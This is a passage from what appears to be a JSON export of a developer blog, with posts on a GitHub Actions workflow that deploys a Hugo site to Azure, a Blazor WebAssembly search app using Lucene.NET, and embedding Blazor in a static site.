binary from the Action to generate the output files. Because my site content isn’t at the root of the repo, it’s in the src folder, I specify the --source flag and override the default output to use an environment variable created at the very top of the Workflow.\nCreating an Artifact A Job is made up of many Steps that are run sequentially, so you could do a build & release all from the one Job, but I prefer to separate those into clearly defined Jobs, making the phases of my Workflow clear. Since each Job runs on a new VM we need some way to get the artifacts that are generated out for use in future Jobs. For this we’ll use the actions/upload-artifact@v1 Action:\n1 2 3 4 5 6 7 8 9 10 11 - name: Publish website output uses: actions/upload-artifact@v1 with: name: website path: ${{ env.OUTPUT_PATH }} - name: Publish blog json uses: actions/upload-artifact@v1 with: name: json path: ${{ env.OUTPUT_PATH }}/index.json Again using the analogy to Azure Pipelines, this is like the PublishPipelineArtifact task, where we specify the name of the artifact and the location on disk to it. Artifacts are packaged as a zip for you, whether they are a single file or a directory, so you don’t need to do any archiving yourself unless you want something special, but then you’ll end up with it zipped anyway.\nYou may also notice that I’m publishing a JSON file, this is a JSON version of my blog which will be used to generate my search index.\nBut, as far as our static website is concerned, we can deploy it to Azure. You’ll find this full pipeline Job here on my GitHub\nBuilding Our Search App The other piece of the application we need to build is the Search App and the Search Index, which is a Blazor WebAssembly application and console application.\nFor this I’ll use two separate jobs, one to build the UI and one to build the index.\nBuilding the Blazor UI As this is a “Continious Integration” Job, like build_hugo, so it’ll start with git checkout, using the actions/checkout@v1 Action:\n1 2 3 4 build_search_ui: runs-on: ubuntu-latest steps: - uses: actions/checkout@v1 To build with .NET there’s a convenient actions/setup-dotnet Action that we can grab, and this one needs to know what version of .NET to download into your Job’s VM. I’m going to add a new environment variable to the top of our file (since we’ll use the same version in the build_search_index Job shortly):\n1 DOTNET_VERSION: "3.1.100-preview3-014645" Then it looks fairly similar to Azure Pipelines:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 build_search_ui: runs-on: ubuntu-latest steps: - uses: actions/checkout@v1 - uses: actions/setup-dotnet@v1 with: dotnet-version: ${{ env.DOTNET_VERSION }} - name: Build search app run: dotnet build --configuration Release working-directory: ./Search - name: Publish search UI run: dotnet publish --no-build --configuration Release --output ${{ env.OUTPUT_PATH }} working-directory: ./Search/Search.Site.UI We have Steps to setup the version of .NET, run dotnet build and finally dotnet publish (of the UI) and then we can package up the outputs (which we learn about previously):\n1 2 3 4 5 - name: Package search UI uses: actions/upload-artifact@v1 with: name: search path: ${{ env.OUTPUT_PATH }}/Search.Site.UI/dist/_framework Blazor done (GitHub link), onto our search index.\nGenerating the Search Index This Job is going to be dependant on an artifact that comes from build_hugo so we need to tell GitHub Actions to wait for that one to complete. If we don’t, our Workflow will run all of our Jobs in parallel, for that we add a dependency list:\n1 2 3 4 5 6 7 8 9 build_search_index: runs-on: ubuntu-latest needs: build_hugo steps: - uses: actions/checkout@v1 - uses: actions/setup-dotnet@v1 with: dotnet-version: ${{ env.DOTNET_VERSION }} We’ll use the same actions/checkout and actions/setup-dotnet here, since we’re ultimately going to use dotnet run, but we’re going to need to get the JSON file to build the index from. For that we can use actions/download-artifact.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 build_search_index: runs-on: ubuntu-latest needs: build_hugo steps: - uses: actions/checkout@v1 - uses: actions/setup-dotnet@v1 with: dotnet-version: ${{ env.DOTNET_VERSION }} - name: Download index source uses: actions/download-artifact@v1 with: name: json path: ${{ env.OUTPUT_PATH }} What’s cool about actions/download-artifact is that it will unpack the zip for you too, so the archiving format isn’t something you need to concern yourself about!\nNow we can build the index and publish it as an artifact:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 build_search_index: runs-on: ubuntu-latest needs: build_hugo steps: - uses: actions/checkout@v1 - uses: actions/setup-dotnet@v1 with: dotnet-version: ${{ env.DOTNET_VERSION }} - name: Download index source uses: actions/download-artifact@v1 with: name: json path: ${{ env.OUTPUT_PATH }} - name: Build search index run: dotnet run working-directory: ./Search/Search.IndexBuilder - name: Publish search index uses: actions/upload-artifact@v1 with: name: search-index path: ./Search/Search.IndexBuilder/index.zip You will notice that I am uploading a zip as an artifact, so it will be “double archived”, but that is because the archive is what the UI application will download from my website, so it’s not a problem.\nAnd with that, the last of the Build Jobs are complete (GitHub link).\nDeploying to Azure Static Websites For my website I use Azure Static Websites as a cheap host. It turns out that there’s a GitHub Action already made for this, feeloor/azure-static-website-deploy which makes things super easy to deploy.\nThis prebuilt Action will deploy your files into the $web container within your Storage Account, as per the standard approach with Static Websites, but I don’t use the $web container directly, instead, I have my site in a subdirectory that uses the Azure Pipelines build number. This allows me to roll back versions if required, or when I break things, diff the changes. So instead of this Action I’m going to use the Azure CLI to do the deployment.\nLet’s start creating the Job:\n1 2 3 4 5 6 7 8 deploy_website: runs-on: ubuntu-latest needs: [build_search_ui, build_search_index] env: STORAGE_NAME: aaronpowellstaticwebsite CDN_NAME: aaronpowell CDN_PROFILE_NAME: aaronpowell RG_NAME: personal-website This is a “Continuous Delivery” Job so I’m prefixing it with deploy, it also has dependencies on the completion of the build_ jobs, which are defined in the needs property. I chose to not put build_hugo in the needs, since it’s enforced by the need to complete build_search_index, but I might change that in future so it’s a bit less opaque what the dependent Jobs are.\nI’ve also created some environment variables needed in Azure, mainly because I dislike inline magic strings. They are created within this Job rather than at the top of the Workflow since they are only used within this Job.\nNow it’s onto the Steps.\nWorking With Azure in Actions Microsoft has provided some Actions that you can use. At the time of writing there isn’t one for working with storage or CDN, we have to do that via the CLI, but before we can do that we need to log into Azure using azure/login:\n1 2 3 4 steps: - uses: azure/login@v1 with: creds: ${{ secrets.AZURE_CREDENTIALS }} To use this you need to create an Azure Service Principal and then store it as a secret variable for your Workflow (no, don’t inline your Azure credentials, that’s just bad).\nNext we need to download some artifacts using actions/download-artifact:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 steps: - uses: azure/login@v1 with: creds: ${{ secrets.AZURE_CREDENTIALS }} - name: Download website uses: actions/download-artifact@v1 with: name: website path: ${{ env.OUTPUT_PATH }} - name: Download search UI uses: actions/download-artifact@v1 with: name: search path: ${{ env.OUTPUT_PATH }}/_framework - name: Download search index uses: actions/download-artifact@v1 with: name: search-index path: ${{ env.OUTPUT_PATH }} I’m being sneaky and downloading them all to the same folder, and since there aren’t any file name collisions my Job’s VM will have the website structure just how I want it!\nIt’s now time to upload the files to storage:\n1 2 - name: Deploy to Azure Storage run: az storage blob upload-batch --source ${{ env.OUTPUT_PATH }} --destination \\$web/${GITHUB_SHA} --account-name ${STORAGE_NAME} I’m using the upload-batch command on the CLI to do a bulk upload, which is faster than going through each file individually. When publishing using Azure Pipelines, the folder in the $web container was the build number, but with GitHub Actions there isn’t a build number, there’s only the SHA of the commit that triggered the action, which we can access using ${GITHUB_SHA}. This does mean I can’t sequentially find what is the latest deployment by browsing the storage account, but it is more obvious what commit relates to what deployment!\nFixing Our WASM App Update: Since I initially wrote this post the uploader has been improved to set the correct content type onf .wasm files, so you don’t need to do it manually. But if you have other files you need to change the content type for, this is how you’d do it.\nWhen you upload files to Azure Storage it will attempt to work out the mime type of the file and set it appropriately. Most of the time this works, except when it doesn’t, and WebAssembly seems to be one of those edge cases at the moment, .wasm files are given the mime type of application/octet-stream but it needs to be application/wasm, otherwise the browser will reject the file.\nBut that’s easily fixed with the Azure CLI!\n1 2 - name: Update wasm pieces run: az storage blob update --container-name \\$web/${GITHUB_SHA}/_framework/wasm --name "mono.wasm" --content-type "application/wasm" --account-name ${STORAGE_NAME} We can run a blob update and change the content-type stored so it gets served correctly.\nUpdating Azure CDN Latest website updates are uploaded, the files have the right types, so there’s one thing left to do, tell Azure CDN to start using the new updates.\nAgain, there isn’t an existing Action (at time of writing), so we’ll have to use the CLI. The first step is to update the CDN endpoint to use the new folder:\n1 2 - name: Update CDN endpoint run: az cdn endpoint update --name ${CDN_NAME} --origin-path /${GITHUB_SHA} --profile-name ${CDN_PROFILE_NAME} --resource-group ${RG_NAME} And then we’ll purge the CDN cache so that the new files are sent to our readers:\n1 2 - name: Purge CDN run: az cdn endpoint purge --profile-name ${CDN_PROFILE_NAME} --name ${CDN_NAME} --resource-group ${RG_NAME} --content-paths "/*" Here we’re doing a hard-purge and just deleting everything from the cache, but if you were using it in other scenarios (or had some intelligence around what files were changes) you could set different content-paths and the purge would be quicker.\nBut that’s how we can deploy a static website and update the CDN from GitHub Actions (GitHub link).\nConclusion Throughout this post we’ve seen a bunch of different things with GitHub Actions. We’ve seen how to use some of the Actions provided by the Actions team to check out our source code and work with artifacts. We then used some third party Actions to work with Hugo and Azure.\nWe saw how to define variables that are available throughout a Workflow by putting them at the top of the Workflow, defined some for specific jobs (such as our Azure information), output them from one step to another in a Job or even have credentials made available.\nYou can see the complete Workflow YAML file on my GitHub and check out past runs such as from a recent blog post.\n", "id": "2019-12-17-implementing-github-actions-for-my-blog" }, { "title": "Optimising Our Blazor Search App", "url": "https://www.aaron-powell.com/posts/2019-12-11-optimising-our-blazor-search-app/", "date": "Wed, 11 Dec 2019 09:10:03 +1100", "tags": [ "wasm", "dotnet", "lucene.net", "fsharp" ], "description": "The load time for our Blazor + Lucene.NET app is a bit slow, let's look at how to optimise it.", "content": "When we build a search app using Blazor + Lucene.NET it did a good job of creating our search application but when you run it it’s kind of slow and that’s because we’re downloading the JSON representation of my blog and generating the Lucene.NET index each time. Then when we looked at hosting the Blazor app the main motivation was to use static files rather than getting Blazor to do heavy lifting to generate HTML every time.\nAfter talking to Dan Roth and Microsoft Ignite I got thinking, could we pre-generate the index and ship it down as a static resource somehow?\nLucene Index Primer If we’re going to ship the index to the browser rather than build it there we need to understand what the index is. Since Lucene aims to be as fast a search index as it can it uses a series of binary files to store the indexed data. If you look into a generated index you’ll find files such as _0.cfe or segments.gen. The numbered files are kind of like a database, containing the documents that were indexed and the tokens extracted from the fields, whereas the segments files create a map to where everything is stored.\nUltimately though, we’re going to have multiple files and the names of them are not deterministic as indexing and re-indexing can result in newly generated files or old ones not being cleaned up yet, depending on how well you flushed-on-write.\nSo we’re going to need to get creating.\nGenerating Our Index Before that though we need a way to repeatably generate the index, and to do that we’ll add a new project to our solution:\n1 2 dotnet new console --name Search.IndexBuilder dotnet sln add Search.IndexBuilder The IndexBuilder project is a console application that will replace much of the functionality that our WASM project had in building the index, so it’s going to need some NuGet packages:\n1 2 3 4 5 6 <ItemGroup> <PackageReference Include="Lucene.Net" Version="4.8.0-beta00006" /> <PackageReference Include="Lucene.Net.Analysis.Common" Version="4.8.0-beta00006" /> <PackageReference Include="System.Json" Version="4.7.0-preview3.19551.4" /> <PackageReference Include="FSharp.SystemTextJson" Version="0.6.2" /> </ItemGroup> This also means we can remove System.Json and FSharp.SystemTextJson from the Search.Site project (in time, once we’ve moved the code).\nInside the newly created Program.fs file we can start working on the index creation, first step is to get the JSON for my blog. Rather than downloading it from my website I’m traversing the disk to get it (since the Search App is in the same git repo):\n1 2 3 4 5 6 7 8 [<EntryPoint>] open System open System.IO let main argv = let searchText = File.ReadAllText <| Path.Combine(Environment.CurrentDirectory, "..", "..", ".output", "index.json") 0 Now to parse the JSON into our object model like before:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 open System open System.IO open System.Text.Json open System.Text.Json.Serialization open Search open JsonExtensions let main argv = let searchText = File.ReadAllText <| Path.Combine(Environment.CurrentDirectory, "..", "..", ".output", "index.json") let options = JsonSerializerOptions() options.PropertyNameCaseInsensitive <- true options.Converters.Add(JsonFSharpConverter()) options.Converters.Add(InvalidDateTimeConverter()) let searchData = JsonSerializer.Deserialize<SearchData>(searchText, options) printfn "Got data from export, there are %d posts" searchData.posts.Length 0 Then we’ll finish off with cleaning up previous indexes, making a new one and generating a deployment package:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 open System open System.IO open System.Text.Json open System.Text.Json.Serialization open Search open JsonExtensions open IndexTools open Packager [<EntryPoint>] let main argv = let baseDir = Environment.CurrentDirectory let searchText = File.ReadAllText <| Path.Combine(baseDir, "..", "..", ".output", "index.json") let options = JsonSerializerOptions() options.PropertyNameCaseInsensitive <- true options.Converters.Add(JsonFSharpConverter()) options.Converters.Add(InvalidDateTimeConverter()) let searchData = JsonSerializer.Deserialize<SearchData>(searchText, options) printfn "Got data from export, there are %d posts" searchData.posts.Length cleanupIndex baseDir |> makeIndex searchData |> packageIndex baseDir 0 The cleanupIndex function is a little function responsible for removing a previous index:\n1 2 3 4 5 6 7 let cleanupIndex baseDir = let indexPath = Path.Combine(baseDir, "lucene") if Directory.Exists indexPath then Directory.GetFiles indexPath |> Array.iter File.Delete Directory.Delete indexPath indexPath And the makeIndex function is the same as we had in the OnInitializedAsync function of our component, so I won’t inline it here (you can find it on GitHub).\nThat leaves us with one last function, packageIndex.\nPackaging the Index Remember in the previous post that we noticed that you can use System.IO in Blazor and there is a file system available to you (fun fact, it’s a Linux file system!)? Well that got me thinking since we’re able to write to it with Lucene.NET we should be able to write anything to it, and since we can use any netstandard library we could use an archive as the delivery mechanism!\nAnd that’s just what we’ll do, we’ll use System.IO.Compression.ZipFile:\n1 2 3 4 5 6 7 8 9 10 11 module Packager open System.IO open System.IO.Compression let packageIndex baseDir indexPath = let packagePath = Path.Combine(baseDir, "index.zip") if File.Exists packagePath then File.Delete packagePath ZipFile.CreateFromDirectory(indexPath, packagePath, CompressionLevel.Fastest, false) The packageIndex function will take in a starting directory and the path to the index, and put all those index files into a zip archive. Now we have a file that can be put on our server at a known location with a known file name for use in the component!\nUpdating the Component With the logic to build the index pushed off to a console application, we can now drastically simplify the component that we’ve created. First we’ll download the zip file as a stream and write it to disk:\n1 2 3 4 5 6 7 8 9 let downloadIndex() = task { let path = Path.Combine(Environment.CurrentDirectory, "index.zip") use! stream = http.GetStreamAsync("/index.zip") use file = File.Create path stream.CopyTo file return path } Note: This still uses the HttpClient injected via the Blazor Dependency Injection framework.\nSee how we’re able to use GetStreamAsync to stream the file and copy that stream to a FileStream? This is how you download a file in any .NET Core project, nothing special here even though it’s in WebAssembly.\nThen create another function to unpack the zip:\n1 let extractZip path = ZipFile.ExtractToDirectory(path, Environment.CurrentDirectory) Finally, the OnInitializedAsync can be updated:\n1 2 3 4 5 6 7 8 9 10 11 override this.OnInitializedAsync() = task { let! indexPath = downloadIndex() extractZip indexPath dir <- FSDirectory.Open(Environment.CurrentDirectory) reader <- DirectoryReader.Open dir this.IndexLoaded <- true } |> Task.Ignore Look at that, 25 lines down to 12, and since Lucene.NET is very efficient at opening indexes the application now only takes as long as it takes to download and extract the zip archive (we’re talking fractions of a second vs ten’s of seconds). You’ll find the fully updated component on GitHub.\nConclusion Like with the original experiment to run Lucene.NET in Blazor WebAssembly I was pretty amazed that this “just worked”, especially since it involves downloading a zip file, writing it “to disk” and then unpacking the archive. I remember early in my career that it was nearly impossible to do that on the server and now it’s less than 50 lines of code running in the browser!\nThat aside I think this is a nifty way to think about optimising Blazor applications. It’s very easy to forget that Blazor WASM is going to be running on every client that connects, so they are all going to be doing the heavy lifting, so if there’s an opportunity to offload some of that work and simplify what the client has to do, then it makes sense to do it.\nHere it was a case of generating a Lucene.NET index that we then download, but it could be any number of things that your application would normally “create on startup”.\nBut in the end it all “just works”, which you can see on my sites search feature and the full source code is in the Search folder on my blog’s GitHub repo.\n", "id": "2019-12-11-optimising-our-blazor-search-app" }, { "title": "Can You Use Blazor for Only Part of an App?", "url": "https://www.aaron-powell.com/posts/2019-12-10-can-you-use-blazor-for-only-part-of-an-app/", "date": "Tue, 10 Dec 2019 12:07:13 +1100", "tags": [ "wasm", "dotnet" ], "description": "Blazor is designed for whole-app dev, but what if you don't want it for that?", "content": "Blazor is designed to be a platform where you create a complete web application and we saw that in the last experiment with Blazor where we created a stand-alone search site for my blog. But like any tool in our toolbox, it isn’t always the right one for the job.\nTake my blog for example, it’s pretty much a read-only site with the content stored in GitHub as markdown that I use Hugo to convert into HTML files. Now sure, it’s possible to do it as a Blazor WASM application, we could get a .NET Markdown library could be used and the pages generated on-the-fly, but that’d an inefficient way to have my website run and would provide a sub-optimal experience to readers.\nBut if we want to integrate the search app that we’ve previously built, how do we go about that?\nUnderstanding How Blazor Starts To think about how we can run Blazor WebAssembly within another application we need to learn a bit about how a Blazor WebAssembly application runs.\nWhen you create a new project there’s a file called wwwroot/index.html that you might never have dug into, but this is an important piece of the puzzle. It looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width" /> <title>Project Name</title> <base href="/" /> <link href="css/bootstrap/bootstrap.min.css" rel="stylesheet" /> <link href="css/site.css" rel="stylesheet" /> </head> <body> <app>Loading...</app> <script src="_framework/blazor.webassembly.js"></script> </body> </html> And really, it’s pretty simple, the important pieces that we need are these two lines:\n1 2 3 <app>Loading...</app> <script src="_framework/blazor.webassembly.js"></script> We’ll get to the <app> element shortly, but first, let’s take a look at the JavaScript file. You might notice that this file doesn’t appear anywhere on disk, and that’s because it’s part of the build output. You can find the source of this on GitHub in the ASP.NET Core repository at src/Components/Web.JS/src/Boot.WebAssembly.ts (at the time of writing anyway). This file shares some stuff in common with Blazor Server, but with the main difference of using the MonoPlatform which does a bunch of WASM interop.\nThis file is critical, without it your Blazor application won’t ever start up since it’s responsible for initializing the WASM environment that hosts Mono (by injecting a script into the DOM) and then it will use another generated file, _framework/blazor.boot.json, to work out what .NET DLL’s will need to be loaded into the Mono/WASM environment.\nSo you need to have this JS file included and the _framework folder needs to be at the root since that’s how it finds the JSON file (see this comment).\nLazy-Loading Blazor An interesting aside which I came across while digging in the source is that you can delay the load of Blazor by adding autostart="false" to the <script> tag, as per this line and then call window.Blazor.start() in JavaScript to start the Blazor application.\nI’m not going to use it for this integration, but it’s good to know that you can have a user-initiated initialisation, rather than on page load.\nPlacing Your Blazor App Now that we understand what makes our Blazor app start, how do we know where in the DOM it’ll appear? Well, that’s what the <app> element in our HTML is for, but how does Blazor know about it?\nIt turns out that that is something that we control from our Startup class:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 using Microsoft.AspNetCore.Components.Builder; using Microsoft.Extensions.DependencyInjection; namespace DemoProject { public class Startup { public void ConfigureServices(IServiceCollection services) { } public void Configure(IComponentsApplicationBuilder app) { app.AddComponent<App>("app"); } } } See how on line 14 we’re using AddComponent and specifying a DOM selector of app? That’s how it knows what element in the DOM the application will start. This is something that you can change, maybe make it a selector to a ID of a DOM element or to a <div>, or to anything else that you want, but it’s not that important, so I just leave it as <app>.\nAside: I haven’t tried it yet, but given that you specify the DOM element and the entry component (via generics, this points to App.razor in the above sample) you could potentially have multiple independent Blazor apps running on a page. Why would you do this, I have no idea… but you can in theory!\nHosting Blazor When it comes to hosting Blazor WASM there are a few options but I want to focus on the Azure Storage static sites approach, which is how my blog is hosted.\nFirst thing we’ll need to do is publish the app in Release mode using dotnet publish --configuration Release. From that we’ll grab the contents of the bin/Release/{TARGET FRAMEWORK}/publish/{ASSEMBLY NAME}/dist/_framework folder, which will contain blazor.boot.json, blazor.server.js, blazor.webassembly.js, a folder called _bin and a folder called wasm.\nWe want to copy this _framework folder and place it in the root of our static site, maintaining all the paths so that Blazor can start up.\nNote: According to the docs you can change the content-root and path-base when hosting using dotnet run but I haven’t found them working when it’s published. Also, Hugo is very aggressive at setting absolute paths so I found it easiest to put my WASM files in the same structure that dotnet run used.\nSince this is a search application let’s create a new page called Search and put in our required HTML:\n1 2 3 <app></app> <script src="/_framework/blazor.webassembly.js"></script> Now generate your static site (or whatever host you’re using) and navigate to the /search router.\nIf everything has gone correctly you’ll have just received an error!\nSorry, there’s nothing at this address.\nBlazor Routing If you remember back to our last post we learnt about the @page directive in Razor Components. Here you specify the route that the page will match on and up until now we’ve had @page "/" there. But, we’re now on /search and Blazor’s routing engine has looked at the URL and executed your App.razor component:\n1 2 3 4 5 6 7 8 9 10 <Router AppAssembly="@typeof(Program).Assembly"> <Found Context="routeData"> <RouteView RouteData="@routeData" DefaultLayout="@typeof(MainLayout)" /> </Found> <NotFound> <LayoutView Layout="@typeof(MainLayout)"> <p>Sorry, there's nothing at this address.</p> </LayoutView> </NotFound> </Router> Since the Router didn’t find a matched route to use RouteView against it’s fallen through to NotFound and that is why we have this error!\nDon’t worry, it’s an easy fix, just update the @page directive to match the route that you want it to match on in your published site or simplify your App.razor to not care about routing.\nOnce a new publish is done and the files copied across it’ll be happy.\nConclusion Blazor is a great way which we can build rich applications, but there is value in generating static content upfront and using Blazor to enhance an application rather than own it.\nHere we’ve taken a bit of a look at the important files used to run a Blazor application within an HTML page and we’ve also looked at what it takes to drop it into some other kind of application.\n", "id": "2019-12-10-can-you-use-blazor-for-only-part-of-an-app" }, { "title": "Learn About Serverless Workflows on SSW.tv", "url": "https://www.aaron-powell.com/posts/2019-12-03-learn-about-serverless-workflows-on-sswtv/", "date": "Tue, 03 Dec 2019 13:32:15 +1100", "tags": [ "serverless", "fsharp" ], "description": "I sat down with SSW.tv to talk about how to create workflows using Durable Functions", "content": "At NDC Sydney I was invited by the SSW.tv team to sit down with Anthony Ison and chat about a topic that I’m really passionate about, using Durable Functions to create workflows.\nYou can check out the recording on YouTube, and my previous blog posts on the topic through my serverless tag.\n", "id": "2019-12-03-learn-about-serverless-workflows-on-sswtv" }, { "title": "Implementing Search in Blazor WebAssembly With Lucene.NET", "url": "https://www.aaron-powell.com/posts/2019-11-29-implementing-search-in-blazor-webassembly-with-lucenenet/", "date": "Fri, 29 Nov 2019 10:02:44 +1100", "tags": [ "wasm", "dotnet", "lucene.net", "fsharp" ], "description": "I recently added search to my website and decided to look at how to do it with Blazor, WASM and Lucene.NET", "content": "One of the main reasons I blog is to write stuff down that I have learnt so that in the future I can come back to it rather than having to keep it all in memory. The bonus is that others who come across the same problem can see how I’ve gone about solving it, so it’s a win-win. But when I converted my site to a static website it meant I had to sacrifice a piece of functionality, search. Now sure, we have pretty decent search engines out there in Google and Bing, which is what I tend to use, but I always thought that it’d be nice to integrate it back in someday.\nIn years gone by I’ve done work with Lucene.NET, particularly around its integration with Umbraco, and I’ve read Lucene in Action several times, so I was always thinking “wouldn’t it be cool to put Lucene on my site”. But Lucene is written in Java, Lucene.NET is… well… .NET and none of the JavaScript implementations are as feature complete as I’d like, so it was just something on the back burner… until now!\nBlazor After some conversations at a recent conference, I decided it was time to give Blazor another look. I’d played around with it in the past but nothing more than poking the Hello World demos, so I decided to try something a bit more complex.\nIf you’ve not come across Blazor before, Blazor is a tool for building web UI’s using C# and Razor and with the release of .NET 3.0 Blazor Server went GA. Blazor Server works by generating the HTML on the server and pushing it down to the browser using SignalR then handling all the JavaScript interop for you. You can wire up JavaScript events through C# and build a dynamic web application without writing a single line of JavaScript!\nWhile Blazor Server is cool I’m interested in the other style of Blazor, Blazor WebAssembly. The WebAssembly (WASM) version of Blazor is in preview at the time of writing and will need you to install the .NET Core 3.1 preview build (I’m using Preview 3). The difference from Blazor Server is that rather than running a server connection with SignalR and generating the HTML server-side we compile our .NET application down with a WASM version of the Mono runtime which is then run entirely in the browser. This is perfect for my static blog and I end up with something that’s just HTML, CSS and JavaScript… wait, actually it’s a bit of JavaScript, some WASM byte code and .NET DLLs!\nCreating Our Search App Let’s have a look at what it would take to make a search app using Lucene.NET as the engine. For the time being, we’ll create it separately from the static website but in a future post we’ll look to integrate it in.\nStep 1 - Creating Searchable Content We’re going to need some content to search from somewhere, and how you get that will depend on what kind of system you’re integrating with. Maybe you’ll be pulling some data from a database about products, maybe there’s a REST API to call or in my case, I have ~400 blog posts (and climbing!) that I want to index.\nThe easiest way for me to make this happen is to generate a machine-parsable version of my blog posts, which I’ll do in the form of JSON (I already have XML for my RSS feed, but parsing JSON is a lot easier in .NET) so Hugo needs to be updated to support that.\nFirst up, JSON needs to be added to Hugo’s output in the config.toml for the site:\n1 2 [outputs] home = [ "HTML", "RSS", "JSON"] Then we can create a layout to generate the JSON in your sites layout folder:\n{ "posts": [ {{ range $i, $e := where (.Data.Pages) ".Params.hidden" "!=" true }} {{- if and $i (gt $i 0) -}},{{- end }}{ "title": {{ .Title | jsonify }}, "url": "{{ .Permalink }}", "date": "{{ .Date.Format "Mon, 02 Jan 2006 15:04:05 -0700" | safeHTML }}", "tags": [{{ range $tindex, $tag := $e.Params.tags }}{{ if $tindex }}, {{ end }}"{{ $tag| htmlEscape }}"{{ end }}], "description": {{ .Description | jsonify }}, "content": {{$e.Plain | jsonify}} } {{ end }} ] } I found this template online and it iterates over all visible posts to create a JSON array that looks like this (my blog is ~2mb of JSON!):\n1 2 3 4 5 6 7 8 9 10 11 12 { "posts": [ { "title": "Combining React Hooks With AppInsights", "url": "https://www.aaron-powell.com/posts/2019-11-19-combining-react-hooks-with-appinsights/", "date": "Tue, 19 Nov 2019 11:40:02 +1100", "tags": ["react", "azure", "javascript"], "description": "A look at how to create a custom React Hook to work with AppInsights", "content": "<snip>" } ] } Step 2 - Setting Up Blazor As I mentioned above you’ll need to have .NET Core 3.1 SDK installed to use Blazor WebAssembly and I’m using Preview 3 (SDK 3.1.100-preview3-014645 to be specific).\nLet’s start by creating a solution and our Blazor project:\n1 2 3 4 5 dotnet new sln --name Search dotnet new blazorwasm --name Search.Site.UI dotnet sln add Search.Site.UI dotnet new classlib --name Search.Site --language F# dotnet sln add Search.Site The Blazor project, Search.Site.UI will contain just the .razor files and bootstrapping code, the rest of the logic will be pushed into a separate class library, Search.Site that I’m writing in F#.\nNote: There is a full F#-over-Blazor project called Bolero but it’s using an outdated version of Blazor. I’m also not a huge fan of F#-as-HTML like you get with Bolero, I prefer the Razor approach to binding so I’ll do a mixed-language solution.\nNow we can delete the Blazor sample site by removing everything from the Pages and Shared folder, since we’re going to create it all ourselves, with an empty default page called Index.razor:\n1 2 3 @page "/" <h1>TODO: Searching</h1> And a primitive MainLayout.razor (in the Shared folder):\n1 2 3 @inherits LayoutComponentBase @Body You might be wondering why the MainLayout.razor is so basic, the reason is that when it does come time to integrate it into our larger site we want the Blazor app to inject the minimal amount of HTML and styling, and instead use that from the hosting site, but for today we’ll get some of that from the wwwroot/index.html file.\nStep 3 - Starting Our Blazor UI Let’s build out the UI for search before we worry about the pesky backend. We’ll have the UI handle a few things, first it’ll show a message while the search index is being built (basically a loading screen), once the index is built it will present a search box and when a search is performed it’ll show the results.\nIn Blazor we use Components for pages (and for things we put on a page, but custom components are beyond the scope of what I’ll cover) and they can either have inline code like this:\n1 2 3 4 5 6 7 @page "/" <p>The time is: @Time.ToString("dd/MM/yyy hh:mm:ss")</p> @code { public DateTimeOffset Time => DateTimeOffset.Now; } Or they can inherit from a component class like this:\n1 2 3 4 @page "/" @inherits TimeComponent <p>The time is: @Time.ToString("dd/MM/yyy hh:mm:ss")</p> 1 2 3 public class TimeComponent : ComponentBase { public DateTimeOffset Time => DateTimeOffset.Now; } We’ll use the latter approach as I prefer to separate out processing logic so it could be testable, and also having a “code behind” gives me fond nostalgia to ASP.NET WebForms. 😉\nHere’s what our Component razor will look like:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 @page "/" @if (!IndexLoaded) { <p>Just building the search index, one moment</p> } else { <form @onsubmit="Search"> <input type="search" @bind="SearchTerm" /><button type="submit">Search</button> </form> } @if (SearchResults.Count() > 0) { <ul> @foreach(var result in SearchResults) { <li> <p><a href="@result.Url" title="@result.Title" target="_blank">@result.Title (score: @result.Score.ToString("P2"))</a></p> <p>@result.Description</p> <p class="tags">Tags: @string.Join(" | ", result.Tags)</p> </li> } </ul> } else if (SearchResults.Count() == 0 && !string.IsNullOrEmpty(SearchTerm)) { <p>Nothing matched that query</p> } And let’s break down some of the interesting things, starting with the <form>.\n1 2 3 <form @onsubmit="Search"> <input type="search" @bind="SearchTerm" /><button type="submit">Search</button> </form> This form will submit the search but we don’t want it to go to a server, we want to wire it up to something within our WASM application, and to do that we bind the appropriate DOM event, which is onsubmit, and give it the name of a public method on our Component. We’ll also need to access the search term entered and for that we’ll use two-way data binding to a string property, via the @bind attribute, providing the name of the public property. With this in place Blazor will take care of wiring up the appropriate DOM events so that when the user types and submits to right “backend” is called.\nWhen the search runs it’ll update the SearchResults collection which we can then use a foreach loop over:\n1 2 3 4 5 6 7 @foreach(var result in SearchResults) { <li> <p><a href="@result.Url" title="@result.Title" target="_blank">@result.Title (score: @result.Score.ToString("P2"))</a></p> <p>@result.Description</p> <p class="tags">Tags: @string.Join(" | ", result.Tags)</p> </li> } Here we’re injecting values of our properties into attributes of DOM elements, referencing the .NET objects with the @ prefix, in the same way that has been done with Razor for ASP.NET MVC.\nAnd with that our UI is ready so we can head over and create our “code behind”.\nStep 4 - Creating Our Component Our Component is going to be written in F# and living in the Search.Site class library, so we’ll need to add some NuGet packages:\n1 dotnet add package Microsoft.AspNetCore.Blazor --version 3.1.0-preview3.19555.2 Note: We’re using the preview packages here, just like we’re using the preview .NET Core build, but ensure you use the latest packages available, and they match the ones in the UI project.\nI’m also going to include the excellent TaskBuilder.fs package so that we can use F# computation expressions to work with the C# Task API.\n1 dotnet add package TaskBuilder.fs --version 2.1.0 We’re going to need a complex type to represent the results from our search so we’ll add a file, SearchResult.fs (I use Ionide so it automatically adds it to the fsproj file), and create a Record Type in it:\n1 2 3 4 5 6 7 8 module SearchResult type Post = { Title: string Url: string Tags: string [] Description: string Score: float32 } Now let’s create a file called SearchComponent.fs and we can start scaffolding our component:\n1 2 3 4 5 6 7 8 9 10 11 12 13 namespace Search.Site open Microsoft.AspNetCore.Components open SearchResult type SearchComponent() = inherit ComponentBase() member val IndexLoaded = false with get, set member val SearchTerm = "" with get, set member val SearchResults = Array.empty<Post> with get, set member this.Search() = ignore() And back to Index.razor in the Blazor project we can add @inherits 